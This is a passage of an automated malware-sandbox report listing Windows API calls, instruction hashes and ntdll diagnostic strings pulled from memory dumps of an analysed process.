                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_72STaC6BmljfbIQ.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostThread
                                                                                                      • String ID: 40F193-3PQ$40F193-3PQ
                                                                                                      • API String ID: 1836367815-1005098266
                                                                                                      • Opcode ID: e6ba9eb905182b9ec34c9235bf651bffb639cd546324c055ce8da76e89865faa
                                                                                                      • Instruction ID: 5cdb5b93b2f758ed905246f69099698f9d56dcfdbf049b8bc6d5a2d33433c103
                                                                                                      • Opcode Fuzzy Hash: e6ba9eb905182b9ec34c9235bf651bffb639cd546324c055ce8da76e89865faa
                                                                                                      • Instruction Fuzzy Hash: FA012B31D40218B6EB20A7E18C02FDF7B7C8F81B44F008059FA047B2C1D7B8560687E9

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 472 42ca93-42cad1 call 404583 call 42d943 RtlFreeHeap
                                                                                                      APIs
                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CACC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924159868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_72STaC6BmljfbIQ.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: FreeHeap
                                                                                                      • String ID: neA
                                                                                                      • API String ID: 3298025750-2757349852
                                                                                                      • Opcode ID: 24838165d5d3598a3ea7bb2b05c3706a31ee61b17379b23aec4e324c29ae2178
                                                                                                      • Instruction ID: 9121e88aff0d49045895fe5efa263953fc4bc90d71136d3efce1da578365df1c
                                                                                                      • Opcode Fuzzy Hash: 24838165d5d3598a3ea7bb2b05c3706a31ee61b17379b23aec4e324c29ae2178
                                                                                                      • Instruction Fuzzy Hash: 45E092B22042147BD610EF59EC41E9B37ADEFC8710F004419FE09A7242C771B9108BB4

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 532 42ca53-42ca91 call 404583 call 42d943 RtlAllocateHeap
                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(?,0041E604,?,?,00000000,?,0041E604,?,?,?), ref: 0042CA8C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924159868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_72STaC6BmljfbIQ.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: dd039b19f67d4f101c1c83f73f2c4a615ab43ac305152a862787506efeb51d13
                                                                                                      • Instruction ID: 2033942cd3b101f58bf4d77c2136ec80b735e96d56796e01d22862b954715158
                                                                                                      • Opcode Fuzzy Hash: dd039b19f67d4f101c1c83f73f2c4a615ab43ac305152a862787506efeb51d13
                                                                                                      • Instruction Fuzzy Hash: 7CE06DB12442047BDA10EE59EC42E9B37ADDFC4710F004419FA08A7241DA71B95087B4
                                                                                                      APIs
                                                                                                      • ExitProcess.KERNEL32(?,00000000,00000000,?,53EC9B57,?,?,53EC9B57), ref: 0042CB07
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924159868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_72STaC6BmljfbIQ.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ExitProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 621844428-0
                                                                                                      • Opcode ID: e026587fc2ca3ee475d83143d77eba9ec23cbd0096a79b0590467f2d36563e8f
                                                                                                      • Instruction ID: 4f7d0579f0d3a644c73c2585b10cf1452984b28a7a8af53eb300c7de9d046712
                                                                                                      • Opcode Fuzzy Hash: e026587fc2ca3ee475d83143d77eba9ec23cbd0096a79b0590467f2d36563e8f
                                                                                                      • Instruction Fuzzy Hash: CBE046722002147BC620AA6AEC05F9BB76CDBC5724F00441AFB0CAB282DA75BA0187A4
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 62599f371aa306ec3fab32d35960573db7fd628a6b0a69ceafc273b19a8874c4
                                                                                                      • Instruction ID: bdc0dbe846a975e7cebff4f6a6507c02b87ab3cb998b1761fa62cbb6fbe56fa1
                                                                                                      • Opcode Fuzzy Hash: 62599f371aa306ec3fab32d35960573db7fd628a6b0a69ceafc273b19a8874c4
                                                                                                      • Instruction Fuzzy Hash: 0AB09B719015D5C6DA15E7A44708717791077D0701F25C065D2030641F4738C1D1E276
                                                                                                      Strings
                                                                                                      • *** Inpage error in %ws:%s, xrefs: 01238EC8
                                                                                                      • The resource is owned shared by %d threads, xrefs: 01238E2E
                                                                                                      • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01238F34
                                                                                                      • The instruction at %p tried to %s , xrefs: 01238F66
                                                                                                      • Go determine why that thread has not released the critical section., xrefs: 01238E75
                                                                                                      • This failed because of error %Ix., xrefs: 01238EF6
                                                                                                      • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01238E4B
                                                                                                      • write to, xrefs: 01238F56
                                                                                                      • The resource is owned exclusively by thread %p, xrefs: 01238E24
                                                                                                      • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01238F26
                                                                                                      • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01238DD3
                                                                                                      • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01238FEF
                                                                                                      • *** enter .cxr %p for the context, xrefs: 01238FBD
                                                                                                      • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01238DB5
                                                                                                      • The instruction at %p referenced memory at %p., xrefs: 01238EE2
                                                                                                      • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01238E3F
                                                                                                      • an invalid address, %p, xrefs: 01238F7F
                                                                                                      • a NULL pointer, xrefs: 01238F90
                                                                                                      • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01238F2D
                                                                                                      • *** enter .exr %p for the exception record, xrefs: 01238FA1
                                                                                                      • *** An Access Violation occurred in %ws:%s, xrefs: 01238F3F
                                                                                                      • *** Resource timeout (%p) in %ws:%s, xrefs: 01238E02
                                                                                                      • read from, xrefs: 01238F5D, 01238F62
                                                                                                      • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01238E86
                                                                                                      • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01238D8C
                                                                                                      • The critical section is owned by thread %p., xrefs: 01238E69
                                                                                                      • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01238DA3
                                                                                                      • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01238DC4
                                                                                                      • *** then kb to get the faulting stack, xrefs: 01238FCC
                                                                                                      • <unknown>, xrefs: 01238D2E, 01238D81, 01238E00, 01238E49, 01238EC7, 01238F3E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                      • API String ID: 0-108210295
                                                                                                      • Opcode ID: f0ba720239cb675e0bfa2fbe36ead5a582778ec7c89355d718b57d93918965e1
                                                                                                      • Instruction ID: d45806d81af48933475dd054fc96b11d3ed0d1050c8d4b11479209be52b04f18
                                                                                                      • Opcode Fuzzy Hash: f0ba720239cb675e0bfa2fbe36ead5a582778ec7c89355d718b57d93918965e1
                                                                                                      • Instruction Fuzzy Hash: 2C8119B5A74215BFDB2AAB19CC4AE7B3F35EF96B10F050248F6046F252E3B58401D762
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-2160512332
                                                                                                      • Opcode ID: 78e824d5d890c98b89902fe01609bd59c407723a1a4b43221ffc4944ba396ad8
                                                                                                      • Instruction ID: 4288efe51a4ab1cf5b4f4699db283d14c95145db6c2e810db40776e5ff77928e
                                                                                                      • Opcode Fuzzy Hash: 78e824d5d890c98b89902fe01609bd59c407723a1a4b43221ffc4944ba396ad8
                                                                                                      • Instruction Fuzzy Hash: F6929271624742DFE726CF18C888B6BB7E8BB84754F044A1EFA94D7292D770E844CB52
                                                                                                      Strings
                                                                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011F540A, 011F5496, 011F5519
                                                                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011F54CE
                                                                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011F54E2
                                                                                                      • Critical section address., xrefs: 011F5502
                                                                                                      • Critical section debug info address, xrefs: 011F541F, 011F552E
                                                                                                      • Invalid debug info address of this critical section, xrefs: 011F54B6
                                                                                                      • undeleted critical section in freed memory, xrefs: 011F542B
                                                                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 011F5543
                                                                                                      • double initialized or corrupted critical section, xrefs: 011F5508
                                                                                                      • Thread identifier, xrefs: 011F553A
                                                                                                      • Critical section address, xrefs: 011F5425, 011F54BC, 011F5534
                                                                                                      • 8, xrefs: 011F52E3
                                                                                                      • corrupted critical section, xrefs: 011F54C2
                                                                                                      • Address of the debug info found in the active list., xrefs: 011F54AE, 011F54FA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                      • API String ID: 0-2368682639
                                                                                                      • Opcode ID: b710a75f5975da9e31b7cf18edc57cc56a0d510a6f906fc4e757db5f5e07bd29
                                                                                                      • Instruction ID: 29b2189cfa84ca2e4f9fc4bf9223d312ae7c79eba3feea08400c8cd58e7234b1
                                                                                                      • Opcode Fuzzy Hash: b710a75f5975da9e31b7cf18edc57cc56a0d510a6f906fc4e757db5f5e07bd29
                                                                                                      • Instruction Fuzzy Hash: 2381ADB1A40359EFDB68CF99C845BAEBBBAFB48B14F20411DF604B7650D371A941CB60
                                                                                                      Strings
                                                                                                      • RtlpResolveAssemblyStorageMapEntry, xrefs: 011F261F
                                                                                                      • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 011F2602
                                                                                                      • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 011F2412
                                                                                                      • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 011F2506
                                                                                                      • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 011F25EB
                                                                                                      • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 011F22E4
                                                                                                      • @, xrefs: 011F259B
                                                                                                      • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 011F2409
                                                                                                      • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 011F2498
                                                                                                      • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 011F24C0
                                                                                                      • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 011F2624
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                      • API String ID: 0-4009184096
                                                                                                      • Opcode ID: 246bb3a9c5de41cfb62f77b45acfd6d7ad27a01ff3b51f3b6bbcdf78716f1082
                                                                                                      • Instruction ID: 818bfba3cd7109edaa4554f3fd8b87b618b50dd5c215031a81312f5a77c406df
                                                                                                      • Opcode Fuzzy Hash: 246bb3a9c5de41cfb62f77b45acfd6d7ad27a01ff3b51f3b6bbcdf78716f1082
                                                                                                      • Instruction Fuzzy Hash: A90270F1D042299BDB39DB54CD80BE9B7B8AB54704F0141DAEB09A7241DB70AF88CF59
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                      • API String ID: 0-2515994595
                                                                                                      • Opcode ID: 3898fb61eaf6ecb96b6dd8c52c65da877fdc7025bb3268967fe02647a72ab599
                                                                                                      • Instruction ID: 2ef0fa6c3c8e18d441357ebe815420a9e8b95e5bd3c3768f8c989257289da071
                                                                                                      • Opcode Fuzzy Hash: 3898fb61eaf6ecb96b6dd8c52c65da877fdc7025bb3268967fe02647a72ab599
                                                                                                      • Instruction Fuzzy Hash: DD51D171124322ABC32DDF288845BAFBBE8EF98654F54491DFA55C3290E770D608CB92
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                      • API String ID: 0-3197712848
                                                                                                      • Opcode ID: 74e2552ff357814fd0d5f55f65b6cbc8bcd931863a7cd3357ceb23e98b139dff
                                                                                                      • Instruction ID: 4e8ec9be2ed3846323b8d3427f43d1a305e3390f02a64c417d8d3d02104d6cfe
                                                                                                      • Opcode Fuzzy Hash: 74e2552ff357814fd0d5f55f65b6cbc8bcd931863a7cd3357ceb23e98b139dff
                                                                                                      • Instruction Fuzzy Hash: 3C12D0716087528FDB2DDB28D444BABBBE4BF84708F09051DF9A58B291E734D948CB93
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                      • API String ID: 0-1700792311
                                                                                                      • Opcode ID: b65cb8c82c0b97281abf57fed79536f98b5804b17eaf2f8bab169cd14db26d67
                                                                                                      • Instruction ID: f393b7e476e906dac97b586d94e9d7f9c492b23a73b32a5d3ee6d1dad5593dfe
                                                                                                      • Opcode Fuzzy Hash: b65cb8c82c0b97281abf57fed79536f98b5804b17eaf2f8bab169cd14db26d67
                                                                                                      • Instruction Fuzzy Hash: 57D1F1B1520286DFDB2ADF68D441AAEBBF1FF89704F088049F6559B352D734D941CB28
                                                                                                      Strings
                                                                                                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01208A67
                                                                                                      • VerifierDebug, xrefs: 01208CA5
                                                                                                      • VerifierDlls, xrefs: 01208CBD
                                                                                                      • HandleTraces, xrefs: 01208C8F
                                                                                                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01208A3D
                                                                                                      • AVRF: -*- final list of providers -*- , xrefs: 01208B8F
                                                                                                      • VerifierFlags, xrefs: 01208C50
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                      • API String ID: 0-3223716464
                                                                                                      • Opcode ID: 2fd1fc40083df13d619f2f4df16ae287401513d78e080f5cc95f92f95e4cbb1d
                                                                                                      • Instruction ID: 49d5f4fc6ca58f62a4a41a80a8454a15d50be7edddf7cdbca3ce92373b589b73
                                                                                                      • Opcode Fuzzy Hash: 2fd1fc40083df13d619f2f4df16ae287401513d78e080f5cc95f92f95e4cbb1d
                                                                                                      • Instruction Fuzzy Hash: 47913672E65712AFD727EF28D881B2BBBA4AB54714F050718FA45AB2C2D7709C40CB91
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                      • API String ID: 0-1109411897
                                                                                                      • Opcode ID: b14e18fe1f9260537033ec17ca5d3b0b2c38744c5f63004738f9b098b6323a64
                                                                                                      • Instruction ID: ef452a8c5471467c54e062ae9a24deebee6623112f974cf3a881fa3eb54e7ab4
                                                                                                      • Opcode Fuzzy Hash: b14e18fe1f9260537033ec17ca5d3b0b2c38744c5f63004738f9b098b6323a64
                                                                                                      • Instruction Fuzzy Hash: C6A24B74E05A2ACFDB68DF58CC887A9BBB5AF49304F1482E9D50DA7650DB309E85CF40
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-792281065
                                                                                                      • Opcode ID: 50c4d5472befd5b76d0bfbc7824efbf0bb33ce88676d81e626c06886c7b4571f
                                                                                                      • Instruction ID: c0c71adb3fdd3f0d5c746d9dcfbd6db1b3cca44b7823fc472d5ffe5d4604578b
                                                                                                      • Opcode Fuzzy Hash: 50c4d5472befd5b76d0bfbc7824efbf0bb33ce88676d81e626c06886c7b4571f
                                                                                                      • Instruction Fuzzy Hash: B1912971B017159BEB3DDF58E888BEBBBA5FB61B18F04012CE61067685D7789801C7D1
                                                                                                      Strings
                                                                                                      • LdrpInitShimEngine, xrefs: 011D99F4, 011D9A07, 011D9A30
                                                                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 011D9A2A
                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 011D9A11, 011D9A3A
                                                                                                      • apphelp.dll, xrefs: 01176496
                                                                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 011D99ED
                                                                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 011D9A01
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-204845295
                                                                                                      • Opcode ID: 107d10f8ed04026d079f1fb483ed1838f3f9a008212547cca3635457a5374b8b
                                                                                                      • Instruction ID: 963845759e771eed0a310c0f94e73912ac3e5db8ab799989957c892295c9ee6e
                                                                                                      • Opcode Fuzzy Hash: 107d10f8ed04026d079f1fb483ed1838f3f9a008212547cca3635457a5374b8b
                                                                                                      • Instruction Fuzzy Hash: 4A51A2722087059FE72DDF24D885BABB7E8FB84648F01091DF5959B260E730E944DB93
                                                                                                      Strings
                                                                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 011F219F
                                                                                                      • RtlGetAssemblyStorageRoot, xrefs: 011F2160, 011F219A, 011F21BA
                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 011F2178
                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 011F2165
                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 011F2180
                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 011F21BF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                      • API String ID: 0-861424205
                                                                                                      • Opcode ID: 1696ded0a353fc0a9281c7449486c4d236707085e0a65f19d74334275417b7e2
                                                                                                      • Instruction ID: 4415c7b22a8c4ccb62b3d0607b5d546a2758e9d0a383b513cd81bc889e4be027
                                                                                                      • Opcode Fuzzy Hash: 1696ded0a353fc0a9281c7449486c4d236707085e0a65f19d74334275417b7e2
                                                                                                      • Instruction Fuzzy Hash: 7F313536B402117BE72D8A9A8C81FAA7A6CDB65A54F09015DFB04A7180D370EE01C6A5
                                                                                                      Strings
                                                                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 011F81E5
                                                                                                      • Loading import redirection DLL: '%wZ', xrefs: 011F8170
                                                                                                      • LdrpInitializeImportRedirection, xrefs: 011F8177, 011F81EB
                                                                                                      • LdrpInitializeProcess, xrefs: 011BC6C4
                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 011BC6C3
                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 011F8181, 011F81F5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                      • API String ID: 0-475462383
                                                                                                      • Opcode ID: 0db956655d65192168778359e59b0d630eee00950aa2bb93463ee210f2aa42e2
                                                                                                      • Instruction ID: 35fb550e4bae368fc01d7aa37d88bb6b77f4582e4c95e7b21df292c9eec61507
                                                                                                      • Opcode Fuzzy Hash: 0db956655d65192168778359e59b0d630eee00950aa2bb93463ee210f2aa42e2
                                                                                                      • Instruction Fuzzy Hash: 9331E2716487469FD32CEF28DC86E6BBB94AF94B14F05055CF944AB291E720EC04C7A2
                                                                                                      APIs
